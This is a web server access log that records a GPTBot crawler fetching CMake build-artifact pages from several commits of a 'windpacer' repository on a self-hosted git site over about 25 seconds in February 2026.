"/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11198] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:20:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16061] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11299] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15247] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15131] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11235] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15127] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11200] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16064] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13737] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13729] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr 